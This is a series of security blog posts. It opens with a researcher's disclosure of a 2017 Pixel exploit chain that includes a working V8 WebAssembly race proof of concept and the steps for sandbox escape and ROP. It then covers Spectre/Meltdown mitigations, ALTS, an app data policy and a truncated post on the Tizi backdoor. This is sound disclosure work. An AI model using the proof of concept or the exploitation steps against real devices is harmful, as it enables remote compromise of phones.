Posted by Mayank Jain and Scott Roberts, Android security team[Cross-posted from the Android Developers Blog]In June 2017, the Android security team increased the top payouts for the Android Security Rewards (ASR) program and worked with researchers to streamline the exploit submission process. In August 2017, Guang Gong (@oldfresher) of Alpha Team, Qihoo 360 Technology Co. Ltd. submitted the first working remote exploit chain since the ASR program's expansion. For his detailed report, Gong was awarded $105,000, which is the highest reward in the history of the ASR program and $7500 by Chrome Rewards program for a total of $112,500. The complete set of issues was resolved as part of the December 2017 monthly security update. Devices with the security patch level of 2017-12-05 or later are protected from these issues. All Pixel devices or partner devices using A/B (seamless) system updates will automatically install these updates; users must restart their devices to complete the installation. The Android Security team would like to thank Guang Gong and the researcher community for their contributions to Android security. If you'd like to participate in Android Security Rewards program, check out our Program rules. For tips on how to submit reports, see Bug Hunter University. The following article is a guest blog post authored by Guang Gong of Alpha team, Qihoo 360 Technology Ltd.Technical details of a Pixel remote exploit chainThe Pixel phone is protected by many layers of security. It was the only device that was not pwned in the 2017 Mobile Pwn2Own competition. But in August 2017, my team discovered a remote exploit chain—the first of its kind since the ASR program expansion. Thanks to the Android security team for their responsiveness and help during the submission process. This blog post covers the technical details of the exploit chain. The exploit chain includes two bugs, CVE-2017-5116 and CVE-2017-14904. CVE-2017-5116 is a V8 engine bug that is used to get remote code execution in sandboxed Chrome render process. CVE-2017-14904 is a bug in Android's libgralloc module that is used to escape from Chrome's sandbox. Together, this exploit chain can be used to inject arbitrary code into system_server by accessing a malicious URL in Chrome. To reproduce the exploit, an example vulnerable environment is Chrome 60.3112.107 + Android 7.1.2 (Security patch level 2017-8-05) (google/sailfish/sailfish:7.1.2/NJH47F/4146041:user/release-keys). The RCE bug (CVE-2017-5116)New features usually bring new bugs. V8 6.0 introduces support for SharedArrayBuffer, a low-level mechanism to share memory between JavaScript workers and synchronize control flow across workers. SharedArrayBuffers give JavaScript access to shared memory, atomics, and futexes. WebAssembly is a new type of code that can be run in modern web browsers— it is a low-level assembly-like language with a compact binary format that runs with near-native performance and provides languages, such as C/C++, with a compilation target so that they can run on the web. By combining the three features, SharedArrayBuffer WebAssembly, and web worker in Chrome, an OOB access can be triggered through a race condition. Simply speaking, WebAssembly code can be put into a SharedArrayBuffer and then transferred to a web worker. When the main thread parses the WebAssembly code, the worker thread can modify the code at the same time, which causes an OOB access. The buggy code is in the function GetFirstArgumentAsBytes where the argument args may be an ArrayBuffer or TypedArray object. After SharedArrayBuffer is imported to JavaScript, a TypedArray may be backed by a SharedArraybuffer, so the content of the TypedArray may be modified by other worker threads at any time. i::wasm::ModuleWireBytes GetFirstArgumentAsBytes( const v8::FunctionCallbackInfo<v8::Value>& args, ErrorThrower* thrower) { ...... } else if (source->IsTypedArray()) { //--->source should be checked if it's backed by a SharedArrayBuffer // A TypedArray was passed. Local<TypedArray> array = Local<TypedArray>::Cast(source); Local<ArrayBuffer> buffer = array->Buffer(); ArrayBuffer::Contents contents = buffer->GetContents(); start = reinterpret_cast<const byte*>(contents.Data()) + array->ByteOffset(); length = array->ByteLength(); } ...... return i::wasm::ModuleWireBytes(start, start + length);}A simple PoC is as follows: <html><h1>poc</h1><script id="worker1">worker:{ self.onmessage = function(arg) { console.log("worker started"); var ta = new Uint8Array(arg.data); var i =0; while(1){ if(i==0){ i=1; ta[51]=0; //--->4)modify the webassembly code at the same time }else{ i=0; ta[51]=128; } } }}</script><script>function getSharedTypedArray(){ var wasmarr = [ 0x00, 0x61, 0x73, 0x6d, 0x01, 0x00, 0x00, 0x00, 0x01, 0x05, 0x01, 0x60, 0x00, 0x01, 0x7f, 0x03, 0x03, 0x02, 0x00, 0x00, 0x07, 0x12, 0x01, 0x0e, 0x67, 0x65, 0x74, 0x41, 0x6e, 0x73, 0x77, 0x65, 0x72, 0x50, 0x6c, 0x75, 0x73, 0x31, 0x00, 0x01, 0x0a, 0x0e, 0x02, 0x04, 0x00, 0x41, 0x2a, 0x0b, 0x07, 0x00, 0x10, 0x00, 0x41, 0x01, 0x6a, 0x0b]; var sb = new SharedArrayBuffer(wasmarr.length); //---> 1)put WebAssembly code in a SharedArrayBuffer var sta = new Uint8Array(sb); for(var i=0;i<sta.length;i++) sta[i]=wasmarr[i]; return sta; }var blob = new Blob([ document.querySelector('#worker1').textContent ], { type: "text/javascript" })var worker = new Worker(window.URL.createObjectURL(blob)); //---> 2)create a web workervar sta = getSharedTypedArray();worker.postMessage(sta.buffer); //--->3)pass the WebAssembly code to the web workersetTimeout(function(){ while(1){ try{ sta[51]=0; var myModule = new WebAssembly.Module(sta); //--->4)parse the WebAssembly code var myInstance = new WebAssembly.Instance(myModule); //myInstance.exports.getAnswerPlus1(); }catch(e){ } } },1000);//worker.terminate(); </script></html>The text format of the WebAssembly code is as follows: 00002b func[0]:00002d: 41 2a | i32.const 4200002f: 0b | end000030 func[1]:000032: 10 00 | call 0000034: 41 01 | i32.const 1000036: 6a | i32.add000037: 0b | endFirst, the above binary format WebAssembly code is put into a SharedArrayBuffer, then a TypedArray Object is created, using the SharedArrayBuffer as buffer. After that, a worker thread is created and the SharedArrayBuffer is passed to the newly created worker thread. While the main thread is parsing the WebAssembly Code, the worker thread modifies the SharedArrayBuffer at the same time. Under this circumstance, a race condition causes a TOCTOU issue. After the main thread's bound check, the instruction " call 0" can be modified by the worker thread to "call 128" and then be parsed and compiled by the main thread, so an OOB access occurs. Because the "call 0" Web Assembly instruction can be modified to call any other Web Assembly functions, the exploitation of this bug is straightforward. If "call 0" is modified to "call $leak", registers and stack contents are dumped to Web Assembly memory. Because function 0 and function $leak have a different number of arguments, this results in many useful pieces of data in the stack being leaked. (func $leak(param i32 i32 i32 i32 i32 i32)(result i32) i32.const 0 get_local 0 i32.store i32.const 4 get_local 1 i32.store i32.const 8 get_local 2 i32.store i32.const 12 get_local 3 i32.store i32.const 16 get_local 4 i32.store i32.const 20 get_local 5 i32.store i32.const 0 ))Not only the instruction "call 0" can be modified, any "call funcx" instruction can be modified. Assume funcx is a wasm function with 6 arguments as follows, when v8 compiles funcx in ia32 architecture, the first 5 arguments are passed through the registers and the sixth argument is passed through stack. All the arguments can be set to any value by JavaScript: /*Text format of funcx*/ (func $simple6 (param i32 i32 i32 i32 i32 i32 ) (result i32) get_local 5 get_local 4 i32.add)/*Disassembly code of funcx*/--- Code ---kind = WASM_FUNCTIONname = wasm#1compiler = turbofanInstructions (size = 20)0x58f87600 0 8b442404 mov eax,[esp+0x4]0x58f87604 4 03c6 add eax,esi0x58f87606 6 c20400 ret 0x40x58f87609 9 0f1f00 nopSafepoints (size = 8)RelocInfo (size = 0)--- End code ---When a JavaScript function calls a WebAssembly function, v8 compiler creates a JS_TO_WASM function internally, after compilation, the JavaScript function will call the created JS_TO_WASM function and then the created JS_TO_WASM function will call the WebAssembly function. JS_TO_WASM functions use different call convention, its first arguments is passed through stack. If "call funcx" is modified to call the following JS_TO_WASM function. /*Disassembly code of JS_TO_WASM function */--- Code ---kind = JS_TO_WASM_FUNCTIONname = js-to-wasm#0compiler = turbofanInstructions (size = 170)0x4be08f20 0 55 push ebp0x4be08f21 1 89e5 mov ebp,esp0x4be08f23 3 56 push esi0x4be08f24 4 57 push edi0x4be08f25 5 83ec08 sub esp,0x80x4be08f28 8 8b4508 mov eax,[ebp+0x8]0x4be08f2b b e8702e2bde call 0x2a0bbda0 (ToNumber) ;; code: BUILTIN0x4be08f30 10 a801 test al,0x10x4be08f32 12 0f852a000000 jnz 0x4be08f62 <+0x42>The JS_TO_WASM function will take the sixth arguments of funcx as its first argument, but it takes its first argument as an object pointer, so type confusion will be triggered when the argument is passed to the ToNumber function, which means we can pass any values as an object pointer to the ToNumber function. So we can fake an ArrayBuffer object in some address such as in a double array and pass the address to ToNumber. The layout of an ArrayBuffer is as follows: /* ArrayBuffer layouts 40 Bytes*/ Map Properties Elements ByteLength BackingStore AllocationBase AllocationLength Fields internal internal /* Map layouts 44 Bytes*/ static kMapOffset = 0, static kInstanceSizesOffset = 4, static kInstanceAttributesOffset = 8, static kBitField3Offset = 12, static kPrototypeOffset = 16, static kConstructorOrBackPointerOffset = 20, static kTransitionsOrPrototypeInfoOffset = 24, static kDescriptorsOffset = 28, static kLayoutDescriptorOffset = 1, static kCodeCacheOffset = 32, static kDependentCodeOffset = 36, static kWeakCellCacheOffset = 40, static kPointerFieldsBeginOffset = 16, static kPointerFieldsEndOffset = 44, static kInstanceSizeOffset = 4, static kInObjectPropertiesOrConstructorFunctionIndexOffset = 5, static kUnusedOffset = 6, static kVisitorIdOffset = 7, static kInstanceTypeOffset = 8, //one byte static kBitFieldOffset = 9, static kInstanceTypeAndBitFieldOffset = 8, static kBitField2Offset = 10, static kUnusedPropertyFieldsOffset = 11Because the content of the stack can be leaked, we can get many useful data to fake the ArrayBuffer. For example, we can leak the start address of an object, and calculate the start address of its elements, which is a FixedArray object. We can use this FixedArray object as the faked ArrayBuffer's properties and elements fields. We have to fake the map of the ArrayBuffer too, luckily, most of the fields of the map are not used when the bug is triggered. But the InstanceType in offset 8 has to be set to 0xc3(this value depends on the version of v8) to indicate this object is an ArrayBuffer. In order to get a reference of the faked ArrayBuffer in JavaScript, we have to set the Prototype field of Map in offset 16 to an object whose Symbol.toPrimitive property is a JavaScript call back function. When the faked array buffer is passed to the ToNumber function, to convert the ArrayBuffer object to a Number, the call back function will be called, so we can get a reference of the faked ArrayBuffer in the call back function. Because the ArrayBuffer is faked in a double array, the content of the array can be set to any value, so we can change the field BackingStore and ByteLength of the faked array buffer to get arbitrary memory read and write. With arbitrary memory read/write, executing shellcode is simple. As JIT Code in Chrome is readable, writable and executable, we can overwrite it to execute shellcode. Chrome team fixed this bug very quickly in chrome 61.0.3163.79, just a week after I submitted the exploit. The EoP Bug (CVE-2017-14904)The sandbox escape bug is caused by map and unmap mismatch, which causes a Use-After-Unmap issue. The buggy code is in the functions gralloc_map and gralloc_unmap: static int gralloc_map(gralloc_module_t const* module, buffer_handle_t handle){ …… private_handle_t* hnd = (private_handle_t*)handle; …… if (!(hnd->flags & private_handle_t::PRIV_FLAGS_FRAMEBUFFER) && !(hnd->flags & private_handle_t::PRIV_FLAGS_SECURE_BUFFER)) { size = hnd->size; err = memalloc->map_buffer(&mappedAddress, size, hnd->offset, hnd->fd); //---> mapped an ashmem and get the mapped address. the ashmem fd and offset can be controlled by Chrome render process. if(err || mappedAddress == MAP_FAILED) { ALOGE("Could not mmap handle %p, fd=%d (%s)", handle, hnd->fd, strerror(errno)); return -errno; } hnd->base = uint64_t(mappedAddress) + hnd->offset; //---> save mappedAddress+offset to hnd->base } else { err = -EACCES;}…… return err;}gralloc_map maps a graphic buffer controlled by the arguments handle to memory space and gralloc_unmap unmaps it. While mapping, the mappedAddress plus hnd->offset is stored to hnd->base, but while unmapping, hnd->base is passed to system call unmap directly minus the offset. hnd->offset can be manipulated from a Chrome's sandboxed process, so it's possible to unmap any pages in system_server from Chrome's sandboxed render process. static int gralloc_unmap(gralloc_module_t const* module, buffer_handle_t handle){ …… if(hnd->base) { err = memalloc->unmap_buffer((void*)hnd->base, hnd->size, hnd->offset); //---> while unmapping, hnd->offset is not used, hnd->base is used as the base address, map and unmap are mismatched. if (err) { ALOGE("Could not unmap memory at address %p, %s", (void*) hnd->base, strerror(errno)); return -errno; } hnd->base = 0;}…… return 0;}int IonAlloc::unmap_buffer(void *base, unsigned int size, unsigned int /*offset*/) //---> look, offset is not used by unmap_buffer{ int err = 0; if(munmap(base, size)) { err = -errno; ALOGE("ion: Failed to unmap memory at %p : %s", base, strerror(errno)); } return err;}Although SeLinux restricts the domain isolated_app to access most of Android system service, isolated_app can still access three Android system services. 52neverallow isolated_app {53 service_manager_type54 -activity_service55 -display_service56 -webviewupdate_service57}:service_manager find;To trigger the aforementioned Use-After-Unmap bug from Chrome's sandbox, first put a GraphicBuffer object, which is parseable into a bundle, and then call the binder method convertToTranslucent of IActivityManager to pass the malicious bundle to system_server. When system_server handles this malicious bundle, the bug is triggered. This EoP bug targets the same attack surface as the bug in our 2016 MoSec presentation, A Way of Breaking Chrome's Sandbox in Android. It is also similar to Bitunmap, except exploiting it from a sandboxed Chrome render process is more difficult than from an app. To exploit this EoP bug: 1. Address space shaping. Make the address space layout look as follows, a heap chunk is right above some continuous ashmem mapping: 7f54600000-7f54800000 rw-p 00000000 00:00 0 [anon:libc_malloc]7f58000000-7f54a00000 rw-s 001fe000 00:04 32783 /dev/ashmem/360alpha29 (deleted)7f54a00000-7f54c00000 rw-s 00000000 00:04 32781 /dev/ashmem/360alpha28 (deleted)7f54c00000-7f54e00000 rw-s 00000000 00:04 32779 /dev/ashmem/360alpha27 (deleted)7f54e00000-7f55000000 rw-s 00000000 00:04 32777 /dev/ashmem/360alpha26 (deleted)7f55000000-7f55200000 rw-s 00000000 00:04 32775 /dev/ashmem/360alpha25 (deleted)......2. Unmap part of the heap (1 KB) and part of an ashmem memory (2MB–1KB) by triggering the bug: 7f54400000-7f54600000 rw-s 00000000 00:04 31603 /dev/ashmem/360alpha1000 (deleted)7f54600000-7f547ff000 rw-p 00000000 00:00 0 [anon:libc_malloc]//--->There is a 2MB memory gap7f549ff000-7f54a00000 rw-s 001fe000 00:04 32783 /dev/ashmem/360alpha29 (deleted)7f54a00000-7f54c00000 rw-s 00000000 00:04 32781 /dev/ashmem/360alpha28 (deleted)7f54c00000-7f54e00000 rw-s 00000000 00:04 32779 /dev/ashmem/360alpha27 (deleted)7f54e00000-7f55000000 rw-s 00000000 00:04 32777 /dev/ashmem/360alpha26 (deleted)7f55000000-7f55200000 rw-s 00000000 00:04 32775 /dev/ashmem/360alpha25 (deleted)3. Fill the unmapped space with an ashmem memory: 7f54400000-7f54600000 rw-s 00000000 00:04 31603 /dev/ashmem/360alpha1000 (deleted)7f54600000-7f547ff000 rw-p 00000000 00:00 0 [anon:libc_malloc]7f547ff000-7f549ff000 rw-s 00000000 00:04 31605 /dev/ashmem/360alpha1001 (deleted) //--->The gap is filled with the ashmem memory 360alpha10017f549ff000-7f54a00000 rw-s 001fe000 00:04 32783 /dev/ashmem/360alpha29 (deleted)7f54a00000-7f54c00000 rw-s 00000000 00:04 32781 /dev/ashmem/360alpha28 (deleted)7f54c00000-7f54e00000 rw-s 00000000 00:04 32779 /dev/ashmem/360alpha27 (deleted)7f54e00000-7f55000000 rw-s 00000000 00:04 32777 /dev/ashmem/360alpha26 (deleted)7f55000000-7f55200000 rw-s 00000000 00:04 32775 /dev/ashmem/360alpha25 (deleted)4. Spray the heap and the heap data will be written to the ashmem memory: 7f54400000-7f54600000 rw-s 00000000 00:04 31603 /dev/ashmem/360alpha1000 (deleted)7f54600000-7f547ff000 rw-p 00000000 00:00 0 [anon:libc_malloc]7f547ff000-7f549ff000 rw-s 00000000 00:04 31605 /dev/ashmem/360alpha1001 (deleted)//--->the heap manager believes the memory range from 0x7f547ff000 to 0x7f54800000 is still mongered by it and will allocate memory from this range, result in heap data is written to ashmem memory7f549ff000-7f54a00000 rw-s 001fe000 00:04 32783 /dev/ashmem/360alpha29 (deleted)7f54a00000-7f54c00000 rw-s 00000000 00:04 32781 /dev/ashmem/360alpha28 (deleted)7f54c00000-7f54e00000 rw-s 00000000 00:04 32779 /dev/ashmem/360alpha27 (deleted)7f54e00000-7f55000000 rw-s 00000000 00:04 32777 /dev/ashmem/360alpha26 (deleted)7f55000000-7f55200000 rw-s 00000000 00:04 32775 /dev/ashmem/360alpha25 (deleted)5. Because the filled ashmem in step 3 is mapped both by system_server and render process, part of the heap of system_server can be read and written by render process and we can trigger system_server to allocate some GraphicBuffer object in ashmem. As GraphicBuffer is inherited from ANativeWindowBuffer, which has a member named common whose type is android_native_base_t, we can read two function points (incRef and decRef) from ashmem memory and then can calculate the base address of the module libui. In the latest Pixel device, Chrome's render process is still 32-bit process but system_server is 64-bit process. So we have to leak some module's base address for ROP. Now that we have the base address of libui, the last step is to trigger ROP. Unluckily, it seems that the points incRef and decRef haven't been used. It's impossible to modify it to jump to ROP, but we can modify the virtual table of GraphicBuffer to trigger ROP. typedef struct android_native_base_t{ /* a magic value defined by the actual EGL native type */ int magic; /* the sizeof() of the actual EGL native type */ int version; void* reserved[4]; /* reference-counting interface */ void (*incRef)(struct android_native_base_t* base); void (*decRef)(struct android_native_base_t* base);} android_native_base_t;6.Trigger a GC to execute ROP When a GraphicBuffer object is deconstructed, the virtual function onLastStrongRef is called, so we can replace this virtual function to jump to ROP. When GC happens, the control flow goes to ROP. Finding an ROP chain in limited module(libui) is challenging, but after hard work, we successfully found one and dumped the contents of the file into /data/misc/wifi/wpa_supplicant.conf . SummaryThe Android security team responded quickly to our report and included the fix for these two bugs in the December 2017 Security Update. Supported Google device and devices with the security patch level of 2017-12-05 or later address these issues. While parsing untrusted parcels still happens in sensitive locations, the Android security team is working on hardening the platform to mitigate against similar vulnerabilities. The EoP bug was discovered thanks to a joint effort between 360 Alpha Team and 360 C0RE Team. Thanks very much for their effort. .com { color: #32CD32; font-weight: bold; }

Posted by Matt Linton, Senior Security Engineer and Pat Parseghian, Technical Program ManagerYesterday, Google’s Project Zero team posted detailed technical information on three variants of a new security issue involving speculative execution on many modern CPUs. Today, we’d like to share some more information about our mitigations and performance.In response to the vulnerabilities that were discovered we developed a novel mitigation called “Retpoline” -- a binary modification technique that protects against “branch target injection” attacks. We shared Retpoline with our industry partners and have deployed it on Google’s systems, where we have observed negligible impact on performance.In addition, we have deployed Kernel Page Table Isolation (KPTI) -- a general purpose technique for better protecting sensitive information in memory from other software running on a machine -- to the entire fleet of Google Linux production servers that support all of our products, including Search, Gmail, YouTube, and Google Cloud Platform.There has been speculation that the deployment of KPTI causes significant performance slowdowns. Performance can vary, as the impact of the KPTI mitigations depends on the rate of system calls made by an application. On most of our workloads, including our cloud infrastructure, we see negligible impact on performance.In our own testing, we have found that microbenchmarks can show an exaggerated impact. Of course, Google recommends thorough testing in your environment before deployment; we cannot guarantee any particular performance or operational impact.Speculative Execution and the Three Methods of AttackIn addition, to follow up on yesterday’s post, today we’re providing a summary of speculative execution and how each of the three variants work.In order to improve performance, many CPUs may choose to speculatively execute instructions based on assumptions that are considered likely to be true. During speculative execution, the processor is verifying these assumptions; if they are valid, then the execution continues. If they are invalid, then the execution is unwound, and the correct execution path can be started based on the actual conditions. It is possible for this speculative execution to have side effects which are not restored when the CPU state is unwound, and can lead to information disclosure.Project Zero discussed three variants of speculative execution attack. There is no single fix for all three attack variants; each requires protection independently.Variant 1 (CVE-2017-5753), “bounds check bypass.” This vulnerability affects specific sequences within compiled applications, which must be addressed on a per-binary basis.Variant 2 (CVE-2017-5715), “branch target injection”. This variant may either be fixed by a CPU microcode update from the CPU vendor, or by applying a software mitigation technique called “Retpoline” to binaries where concern about information leakage is present. This mitigation may be applied to the operating system kernel, system programs and libraries, and individual software programs, as needed.Variant 3 (CVE-2017-5754), “rogue data cache load.” This may require patching the system’s operating system. For Linux there is a patchset called KPTI (Kernel Page Table Isolation) that helps mitigate Variant 3. Other operating systems may implement similar protections - check with your vendor for specifics.SummaryMitigationVariant 1: bounds check bypass (CVE-2017-5753)This attack variant allows malicious code to circumvent bounds checking features built into most binaries. Even though the bounds checks will still fail, the CPU will speculatively execute instructions after the bounds checks, which can access memory that the code could not normally access. When the CPU determines the bounds check has failed, it discards any work that was done speculatively; however, some changes to the system can be still observed (in particular, changes to the state of the CPU caches). The malicious code can detect these changes and read the data that was speculatively accessed.The primary ramification of Variant 1 is that it is difficult for a system to run untrusted code within a process and restrict what memory within the process the untrusted code can access.In the kernel, this has implications for systems such as the extended Berkeley Packet Filter (eBPF) that takes packet filterers from user space code, just-in-time (JIT) compiles the packet filter code, and runs the packet filter within the context of kernel. The JIT compiler uses bounds checking to limit the memory the packet filter can access, however, Variant 1 allows an attacker to use speculation to circumvent these limitations.Mitigation requires analysis and recompilation so that vulnerable binary code is not emitted. Examples of targets which may require patching include the operating system and applications which execute untrusted code.Variant 2: branch target injection (CVE-2017-5715)This attack variant uses the ability of one process to influence the speculative execution behavior of code in another security context (i.e., guest/host mode, CPU ring, or process) running on the same physical CPU core.Modern processors predict the destination for indirect jumps and calls that a program may take and start speculatively executing code at the predicted location. The tables used to drive prediction are shared between processes running on a physical CPU core, and it is possible for one process to pollute the branch prediction tables to influence the branch prediction of another process or kernel code.In this way, an attacker can cause speculative execution of any mapped code in another process, in the hypervisor, or in the kernel, and potentially read data from the other protection domain using techniques like Variant 1. This variant is difficult to use, but has great potential power as it crosses arbitrary protection domains.Mitigating this attack variant requires either installing and enabling a CPU microcode update from the CPU vendor (e.g., Intel's IBRS microcode), or applying a software mitigation (e.g., Google's Retpoline) to the hypervisor, operating system kernel, system programs and libraries, and user applications.Variant 3: rogue data cache load (CVE-2017-5754)This attack variant allows a user mode process to access virtual memory as if the process was in kernel mode. On some processors, the speculative execution of code can access memory that is not typically visible to the current execution mode of the processor; i.e., a user mode program may speculatively access memory as if it were running in kernel mode.Using the techniques of Variant 1, a process can observe the memory that was accessed speculatively. On most operating systems today, the page table that a process uses includes access to most physical memory on the system, however access to such memory is limited to when the process is running in kernel mode. Variant 3 enables access to such memory even in user mode, violating the protections of the hardware.Mitigating this attack variant requires patching the operating system. For Linux, the patchset that mitigates Variant 3 is called Kernel Page Table Isolation (KPTI). Other operating systems/providers should implement similar mitigations.Mitigations for Google productsYou can learn more about mitigations that have been applied to Google’s infrastructure, products, and services here.

Posted by Matt Linton, Senior Security Engineer and Pat Parseghian, Technical Program Manager[Google Cloud, G Suite, and Chrome customers can visit the Google Cloud blog for details about those products][For more technical details about this issue, please read Project Zero's blog post]Last year, Google’s Project Zero team discovered serious security flaws caused by “speculative execution,” a technique used by most modern processors (CPUs) to optimize performance.The Project Zero researcher, Jann Horn, demonstrated that malicious actors could take advantage of speculative execution to read system memory that should have been inaccessible. For example, an unauthorized party may read sensitive information in the system’s memory such as passwords, encryption keys, or sensitive information open in applications. Testing also showed that an attack running on one virtual machine was able to access the physical memory of the host machine, and through that, gain read-access to the memory of a different virtual machine on the same host.These vulnerabilities affect many CPUs, including those from AMD, ARM, and Intel, as well as the devices and operating systems running on them.As soon as we learned of this new class of attack, our security and product development teams mobilized to defend Google’s systems and our users’ data. We have updated our systems and affected products to protect against this new type of attack. We also collaborated with hardware and software manufacturers across the industry to help protect their users and the broader web. These efforts have included collaborative analysis and the development of novel mitigations.We are posting before an originally coordinated disclosure date of January 9, 2018 because of existing public reports and growing speculation in the press and security research community about the issue, which raises the risk of exploitation. The full Project Zero report is forthcoming (update: this has been published; see above).Mitigation status for Google productsA list of affected Google products and their current status of mitigation against this attack appears here. As this is a new class of attack, our patch status refers to our mitigation for currently known vectors for exploiting the flaw. The issue has been mitigated in many products (or wasn’t a vulnerability in the first place). In some instances, users and customers may need to take additional steps to ensure they’re using a protected version of a product. This list and a product’s status may change as new developments warrant. In the case of new developments, we will post updates to this blog.All Google products not explicitly listed below require no user or customer action.AndroidDevices with the latest security update are protected. Furthermore, we are unaware of any successful reproduction of this vulnerability that would allow unauthorized information disclosure on ARM-based Android devices.Supported Nexus and Pixel devices with the latest security update are protected.Further information is available here.Google Apps / G Suite (Gmail, Calendar, Drive, Sites, etc.):No additional user or customer action needed.Google ChromeSome user or customer action needed. More information here.Google Chrome OS (e.g., Chromebooks):Some additional user or customer action needed. More information here.Google Cloud PlatformGoogle App Engine: No additional customer action needed.Google Compute Engine: Some additional customer action needed. More information here.Google Kubernetes Engine: Some additional customer action needed. More information here.Google Cloud Dataflow: Some additional customer action needed. More information here.Google Cloud Dataproc: Some additional customer action needed. More information here. All other Google Cloud products and services: No additional action needed.Google Home / Chromecast:No additional user action needed.Google Wifi/OnHub:No additional user action needed.Multiple methods of attackTo take advantage of this vulnerability, an attacker first must be able to run malicious code on the targeted system.The Project Zero researchers discovered three methods (variants) of attack, which are effective under different conditions. All three attack variants can allow a process with normal user privileges to perform unauthorized reads of memory data, which may contain sensitive information such as passwords, cryptographic key material, etc.In order to improve performance, many CPUs may choose to speculatively execute instructions based on assumptions that are considered likely to be true. During speculative execution, the processor is verifying these assumptions; if they are valid, then the execution continues. If they are invalid, then the execution is unwound, and the correct execution path can be started based on the actual conditions. It is possible for this speculative execution to have side effects which are not restored when the CPU state is unwound, and can lead to information disclosure.There is no single fix for all three attack variants; each requires protection independently. Many vendors have patches available for one or more of these attacks.We will continue our work to mitigate these vulnerabilities and will update both our product support page and this blog post as we release further fixes. More broadly, we appreciate the support and involvement of all the partners and Google engineers who worked tirelessly over the last few months to make our users and customers safe.Blog post update logAdded link to Project Zero blogAdded link to Google Cloud blog

Posted by Cesar Ghali and Julien Boeuf, Engineers on the Security & Privacy TeamAt Google, protection of customer data is a top priority. One way we do this is by protecting data in transit by default. We protect data when it is sent to Google using secure communication protocols such as TLS (Transport Layer Security). Within our infrastructure, we protect service-to-service communications at the application layer using a system called Application Layer Transport Security (ALTS). ALTS authenticates the communication between Google services and helps protect data in transit. Today, we’re releasing a whitepaper, “Application Layer Transport Security,” that goes into detail about what ALTS is, how it protects data, and how it’s implemented at Google.ALTS is a highly reliable, trusted system that provides authentication and security for our internal Remote Procedure Call (RPC) communications. ALTS requires minimal involvement from the services themselves. When services communicate with each other at Google, such as the Gmail frontend communicating with a storage backend system, they do not need to explicitly configure anything to ensure data transmission is protected - it is protected by default. All RPCs issued or received by a production workload that stay within a physical boundary controlled by or on behalf of Google are protected with ALTS by default. This delivers numerous benefits while allowing the system work at scale:More precise security: Each workload has its own identity. This allows workloads running on the same machine to authenticate using their own identity as opposed to the machine’s identity.Improved scalability: ALTS accommodates Google’s massive scale by using an efficient resumption mechanism embedded in the ALTS handshake protocol, allowing services that were already communicating to easily resume communications. ALTS can also accommodate the authentication and encryption needs of a large number of RPCs; for example, services running on Google production systems collectively issue on the order of O(1010) RPCs per second.Reduced overhead: The overhead of potentially expensive cryptographic operations can be reduced by supporting long-lived RPC channels.Multiple features that ensure security and scalabilityInside physical boundaries controlled by or on behalf of Google, all scheduled production workloads are initialized with a certificate that asserts their identity. These credentials are securely delivered to the workloads. When a workload is involved in an ALTS handshake, it verifies the remote peer identity and certificate. To further increase security, all Google certificates have a relatively short lifespan.ALTS has a flexible trust model that works for different types of entities on the network. Entities can be physical machines, containerized workloads, and even human users to whom certificates can be provisioned.ALTS provides a handshake protocol, which is a Diffie-Hellman (DH) based authenticated key exchange protocol that Google developed and implemented. At the end of a handshake, ALTS provides applications with an authenticated remote peer identity, which can be used to enforce fine-grained authorization policies at the application layer.ALTS ensures the integrity of Google traffic is protected, and encrypted as needed.After a handshake is complete and the client and server negotiate the necessary shared secrets, ALTS secures RPC traffic by forcing integrity, and optional encryption, using the negotiated shared secrets. We support multiple protocols for integrity guarantees, e.g., AES-GMAC and AES-VMAC with 128-bit keys. Whenever traffic leaves a physical boundary controlled by or on behalf of Google, e.g., in transit over WAN between datacenters, all protocols are upgraded automatically to provide encryption as well as integrity guarantees. In this case, we use the AES-GCM and AES-VCM protocols with 128-bit keys.More details on how Google data encryption is performed are available in another whitepaper we are releasing today, “Encryption in Transit in Google Cloud.”In summary, ALTS is widely used in Google’s infrastructure to provide service-to-service authentication and integrity, with optional encryption for all Google RPC traffic. For more information about ALTS, please read our whitepaper, “Application Layer Transport Security.”

Posted by Paul Stanton and Brooke Heinichen, Safe Browsing TeamUpdated on 12/14/17 to further distinguish between Unwanted Software Policy and Google Play Developer Program PolicyIn our efforts to protect users and serve developers, the Google Safe Browsing team has expanded enforcement of Google's Unwanted Software Policy to further tamp down on unwanted and harmful mobile behaviors on Android. As part of this expanded enforcement, Google Safe Browsing will show warnings on apps and on websites leading to apps that collect a user’s personal data without their consent.Apps handling personal user data (such as user phone number or email), or device data will be required to prompt users and to provide their own privacy policy in the app. Additionally, if an app collects and transmits personal data unrelated to the functionality of the app then, prior to collection and transmission, the app must prominently highlight how the user data will be used and have the user provide affirmative consent for such use.These data collection requirements apply to all functions of the app. For example, during analytics and crash reportings, the list of installed packages unrelated to the app may not be transmitted from the device without prominent disclosure and affirmative consent.These requirements, under the Unwanted Software Policy, apply to apps in Google Play and non-Play app markets. The Google Play team has also published guidelines for how Play apps should handle user data and provide disclosure.Starting in 60 days, this expanded enforcement of Google’s Unwanted Software Policy may result in warnings shown on user devices via Google Play Protect or on webpages that lead to these apps. Webmasters whose sites show warnings due to distribution of these apps should refer to the Search Console for guidance on remediation and resolution of the warnings. Developers whose apps show warnings should refer to guidance in the Unwanted Software Help Center. Developers can also request an app review using this article on App verification and appeals, which contains guidance applicable to apps in both Google Play and non-Play app stores. Apps published in Google Play have specific criteria to meet under Google Play’s Developer Program Policies; these criteria are outlined in the Play August 2017 announcement.

Posted by Anthony Desnos, Megan Ruthven, and Richard Neal, Google Play Protect security engineers and Clement Lecigne, Threat Analysis GroupGoogle is constantly working to improve our systems that protect users from Potentially Harmful Applications (PHAs). Usually, PHA authors attempt to install their harmful apps on as many devices as possible. However, a few PHA authors spend substantial effort, time, and money to create and install their harmful app on a small number of devices to achieve a certain goal.This blog post covers Tizi, a backdoor family with some rooting capabilities that was used in a targeted attack against devices in African countries, specifically: Kenya, Nigeria, and Tanzania. We'll talk about how the Google Play Protect and Threat Analysis teams worked together to detect and investigate Tizi-infected apps and remove and block them from Android devices.What is Tizi?Tizi is a fully featured backdoor that installs spyware to steal sensitive data from popular social media applications. The Google Play Protect security team discovered this family in September 2017 when device scans found an app with rooting capabilities that exploited old vulnerabilities. The team used this app to find more applications in the Tizi family, the oldest of which is from October 2015. The Tizi app developer also created a website and used social media to encourage more app installs from Google Play and third-party websites.Here is an example social media post promoting a Tizi-infected app:What is the scope of Tizi?What are we doing?To protect Android devices and users, we used Google Play Protect to disable Tizi-infected apps on affected devices and have notified users of all known affected devices. The developers' accounts have been suspended from Play.The Google Play Protect team also used information and signals from the Tizi apps to 